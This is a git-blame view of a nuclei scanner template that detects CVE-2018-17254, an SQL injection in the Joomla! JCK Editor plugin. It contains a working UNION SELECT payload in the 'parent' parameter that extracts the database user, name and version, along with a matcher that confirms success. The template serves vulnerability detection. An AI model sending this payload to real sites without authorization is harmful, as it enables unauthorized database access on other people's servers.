nuclei-templates/http/cves/2018/CVE-2018-17254.yaml

41 lines
1.3 KiB
YAML
Raw Normal View History

id: CVE-2018-17254
info:
name: Joomla! JCK Editor SQL Injection
author: Suman_Kar
severity: critical
description: The JCK Editor component 6.4.4 for Joomla! allows SQL Injection via the jtreelink/dialogs/links.php parent parameter.
2023-09-06 12:57:14 +00:00
remediation: Update or remove the affected plugin.
2021-08-29 09:14:12 +00:00
reference:
2021-08-09 13:35:43 +00:00
- http://packetstormsecurity.com/files/161683/Joomla-JCK-Editor-6.4.4-SQL-Injection.html
- https://www.exploit-db.com/exploits/45423/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2018-17254
cwe-id: CWE-89
2023-08-31 11:46:18 +00:00
epss-score: 0.81793
epss-percentile: 0.97989
2023-09-06 12:57:14 +00:00
cpe: cpe:2.3:a:arkextensions:jck_editor:6.4.4:*:*:*:*:joomla\!:*:*
metadata:
max-request: 1
2023-07-11 19:49:27 +00:00
vendor: arkextensions
product: jck_editor
2023-09-06 12:57:14 +00:00
framework: joomla\!
2023-07-11 19:49:27 +00:00
tags: cve,cve2018,packetstorm,edb,joomla,sqli
2023-07-20 07:43:09 +00:00
variables:
num: "999999999"
http:
- raw:
- |
2023-07-20 07:43:09 +00:00
GET /plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php?extension=menu&view=menu&parent="%20UNION%20SELECT%20NULL,NULL,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION(),md5({{num}})),NULL,NULL,NULL,NULL,NULL--%20aa HTTP/1.1
Host: {{Hostname}}
Referer: {{BaseURL}}
matchers:
- type: word
part: body
words:
2023-07-20 07:43:09 +00:00
- '{{md5(num)}}'